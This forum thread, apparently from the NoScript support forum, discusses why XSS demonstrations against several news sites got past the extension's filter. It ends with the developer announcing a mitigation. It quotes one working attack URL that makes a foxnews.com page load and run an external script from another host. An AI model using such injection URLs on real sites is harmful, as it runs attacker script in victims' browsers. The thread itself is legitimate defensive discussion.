XSS examples not blocked by Noscript?
XSS examples not blocked by Noscript?
I just learned about
http://davidlynch.org/blog/2011/10/xss-is-fun/
which provides some XSS examples for several popular websites.
These examples only work if also davidlynch.org is whitelisted so we are protected by default. Nevertheless, shouldn't the XSS filter of Noscript stop these examples even if the originating site is whitelisted?
http://davidlynch.org/blog/2011/10/xss-is-fun/
which provides some XSS examples for several popular websites.
These examples only work if also davidlynch.org is whitelisted so we are protected by default. Nevertheless, shouldn't the XSS filter of Noscript stop these examples even if the originating site is whitelisted?
Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Re: XSS examples not blocked by Noscript?
Neat, http://news.cnet.com/, heh.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows NT 5.1; rv:9.0a2) Gecko/20111017 Firefox/9.0a2 SeaMonkey/2.6a2
Re: XSS examples not blocked by Noscript?
Yes, all of these examples are funny. But since http://noscript.net/features#xss says:therube wrote:Neat, http://news.cnet.com/, heh.
.... we shouldn't be able to see them, or, at least, we should get a warning. Or am I missing something?Furthermore, NoScript's sophisticated InjectionChecker engine checks also all the requests started from whitelisted origins for suspicious patterns landing on different trusted sites: if a potential XSS attack is detected, even if coming from a trusted source, Anti-XSS filters are promptly triggered.
Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Re: XSS examples not blocked by Noscript?
Actually both davidlynch.org & the "host" domain need to be Allowed.These examples only work if also davidlynch.org is whitelisted
And given that, I suppose that is why NoScript does not notify.
One would not normally allow davidlynch.org & so in these cases the exploit would never occur.
If you were not a NoScript user, JavaScript would be allowed everywhere, in all cases, so his exploits would "just work".
Being a NoScript user, his exploits fail.
In order to force the exploit to work, you need to allow both domains, & in doing so it is no longer an exploit (to NoScript) because you have allowed (agreed) to be exploited.
XSS sample with warning, here.
Actually his exploit code looks to not work in IE8?
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows NT 5.1; rv:9.0a2) Gecko/20111017 Firefox/9.0a2 SeaMonkey/2.6a2
Re: XSS examples not blocked by Noscript?
That's what i wrote above.therube wrote:Actually both davidlynch.org & the "host" domain need to be Allowed.These examples only work if also davidlynch.org is whitelisted
I think it should considering the quotation in my last post.And given that, I suppose that is why NoScript does not notify.
Absolutely. The question is only why the Noscript InjectionChecker doesn't recognize the request as a potential XSS attack "even if coming from a trusted source".One would not normally allow davidlynch.org & so in these cases the exploit would never occur.
Yes, that's what I expected to see.XSS sample with warning,
Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
- Giorgio Maone
- Site Admin
- Posts: 9455
- Joined: Wed Mar 18, 2009 11:22 pm
- Location: Palermo - Italy
- Contact:
Re: XSS examples not blocked by Noscript?
If you looked at the attack URLs, e.g
http://www.foxnews.com/eyewonder/interim.html?src=http://davidlynch.org/projects/xss/eyewonder.js
you'd see that NoScript's XSS filter can't do anything specific to block them, because otherwise no redirection service or any other web application which takes absolute URLs as parameters (e.g. URL shorteners, or any blog comment form) would work.
The problem here is the incredible stupidity of the developers of those sites, which have implemented their page to load any script whose address is passed as the src query string parameter.
In other words, no Javascript code is passed in the request, just an "innocent" URL which the page idiotically turns into a script source.
Fortunately enough, as you noticed, this kind of setup (which bypasses any XSS filter because it's technically not a "regular" XSS) still cannot work unless the attacker's script source (which necessarily belongs to an URL different than the attacked site) is allowed.
http://www.foxnews.com/eyewonder/interim.html?src=http://davidlynch.org/projects/xss/eyewonder.js
you'd see that NoScript's XSS filter can't do anything specific to block them, because otherwise no redirection service or any other web application which takes absolute URLs as parameters (e.g. URL shorteners, or any blog comment form) would work.
The problem here is the incredible stupidity of the developers of those sites, which have implemented their page to load any script whose address is passed as the src query string parameter.
In other words, no Javascript code is passed in the request, just an "innocent" URL which the page idiotically turns into a script source.
Fortunately enough, as you noticed, this kind of setup (which bypasses any XSS filter because it's technically not a "regular" XSS) still cannot work unless the attacker's script source (which necessarily belongs to an URL different than the attacked site) is allowed.
Mozilla/5.0 (Windows NT 5.2; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
- GµårÐïåñ
- Lieutenant Colonel
- Posts: 3365
- Joined: Fri Mar 20, 2009 5:19 am
- Location: PST - USA
- Contact:
Re: XSS examples not blocked by Noscript?
I guess you don't get what TRUSTED means which is to say that you are allowing it to do whatever because you TRUSTED it. Script injections are not that uncommon even by legitimate sources, and if you TRUST them, they can do it, if you don't, they can't. Simple enough, so I don't get why you are not getting this. If you have to allow a bad site for it to screw you over, then it was working just as it should and YOU chose to TRUST it to do what it needs to screw you over. Are we missing something here?tlu wrote:Absolutely. The question is only why the Noscript InjectionChecker doesn't recognize the request as a potential XSS attack "even if coming from a trusted source".
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
________________ .: [ Major Mike's ] :. ________________
Mozilla/6.9 (Windows NT 6.9; rv:6.9) Gecko/69696969 Firefox/6.9
- Giorgio Maone
- Site Admin
- Posts: 9455
- Joined: Wed Mar 18, 2009 11:22 pm
- Location: Palermo - Italy
- Contact:
Re: XSS examples not blocked by Noscript?
tlu is right in his understanding that NoScript's XSS filters blocks XSS attacks even if they come from a source which is in your scripting whitelist.
In this case, though, this doesn't happen because there's no XSS payload to be stripped but just a URL which the victim site idiotically uses as a reference to an external script source.
In this case, though, this doesn't happen because there's no XSS payload to be stripped but just a URL which the victim site idiotically uses as a reference to an external script source.
Mozilla/5.0 (Windows NT 5.2; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
- GµårÐïåñ
- Lieutenant Colonel
- Posts: 3365
- Joined: Fri Mar 20, 2009 5:19 am
- Location: PST - USA
- Contact:
Re: XSS examples not blocked by Noscript?
Correct, not arguing that. But anytime you have to have to explicitly allow something to work, even if it happens to be bad coding by the site, to have the exploit work on it, then the security tool is still preventing it even if using a different vector (in this case blocking a different domain and not letting it be governed by the trusted status of the idiot site) which may not be using the XSS engine because it doesn't qualify as one but still the protection is there none the less unless you allow it to take advantage of that exploit.Giorgio Maone wrote:tlu is right in his understanding that NoScript's XSS filters blocks XSS attacks even if they come from a source which is in your scripting whitelist.
In this case, though, this doesn't happen because there's no XSS payload to be stripped but just a URL which the victim site idiotically uses as a reference to an external script source.
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
________________ .: [ Major Mike's ] :. ________________
Mozilla/6.9 (Windows NT 6.9; rv:6.9) Gecko/69696969 Firefox/6.9
Re: XSS examples not blocked by Noscript?
Because you're much more intelligent than I am?GµårÐïåñ wrote:I guess you don't get what TRUSTED means which is to say that you are allowing it to do whatever because you TRUSTED it. Script injections are not that uncommon even by legitimate sources, and if you TRUST them, they can do it, if you don't, they can't. Simple enough, so I don't get why you are not getting this.tlu wrote:Absolutely. The question is only why the Noscript InjectionChecker doesn't recognize the request as a potential XSS attack "even if coming from a trusted source".
Yes, you are. There must be a reason why Giorgio constructed the XSS filter in such a way that it also blocks XSS attacks coming from trusted sites. It it were that simple as you suggest this wouldn't have been necessary. And if I remember correctly, this feature didn't exist in earlier versions - it was introduced later. Again, there must be a reason why.If you have to allow a bad site for it to screw you over, then it was working just as it should and YOU chose to TRUST it to do what it needs to screw you over. Are we missing something here?
Anyway, it's a built-in feature, and my only question was why it doesn't work in these examples. "Simple enough, so I don't get why you are not getting this."
Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Re: XSS examples not blocked by Noscript?
Thanks, Giorgio for this explanation. I understand what you're saying, and I agree that risk is low as Noscript blocks it by default (= if the origination site isn't whitelisted). Nevertheless, I wonder if this technique can't be used for a new class of attacks if an attacker succeeds to manipulate the originating site which might be a trustworthy and, thus, whitelisted website. In those examples the results were only funny, but other outcomes are conceivable.Giorgio Maone wrote: you'd see that NoScript's XSS filter can't do anything specific to block them, because otherwise no redirection service or any other web application which takes absolute URLs as parameters (e.g. URL shorteners, or any blog comment form) would work.
The problem here is the incredible stupidity of the developers of those sites, which have implemented their page to load any script whose address is passed as the src query string parameter.
In other words, no Javascript code is passed in the request, just an "innocent" URL which the page idiotically turns into a script source.
Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
- Giorgio Maone
- Site Admin
- Posts: 9455
- Joined: Wed Mar 18, 2009 11:22 pm
- Location: Palermo - Italy
- Contact:
Re: XSS examples not blocked by Noscript?
Fortunately it's a very limited "class" of attacks, since using a parameter as the script source is something so stupid that I've never seen it before and hopefully will never see again (any developer with a clue understands that). The fact we're seen it on multiple sites at the same times is just due to their reliance on the same buggy tool.tlu wrote: I wonder if this technique can't be used for a new class of attacks
That said, I'm gonna implement in next dev build a further (pretty unique) mitigation, which can neutralize this attack even if the injected script source comes from a trusted origin.
Mozilla/5.0 (Windows NT 5.2; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Re: XSS examples not blocked by Noscript?
That's really great! Giorgio, thank you very much!!Giorgio Maone wrote: That said, I'm gonna implement in next dev build a further (pretty unique) mitigation, which will neutralize this attack even if the injected script source comes from a trusted origin.
Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Re: XSS examples not blocked by Noscript?
+1tlu wrote: That's really great! Giorgio, thank you very much!!
because strictly XSS or not, buggy tool or not, NS runs on this system to anticipate both the dangerous and the dumb.
Giorgio, we've already donated but not even the most expensive proprietary software offers such generous support as you and your team.
NS is priceless.
NS AMO Beta channel subscription.
Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
- Giorgio Maone
- Site Admin
- Posts: 9455
- Joined: Wed Mar 18, 2009 11:22 pm
- Location: Palermo - Italy
- Contact:
Re: XSS examples not blocked by Noscript?
Please check latest development build 2.1.8rc1
Mozilla/5.0 (Windows NT 5.2; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1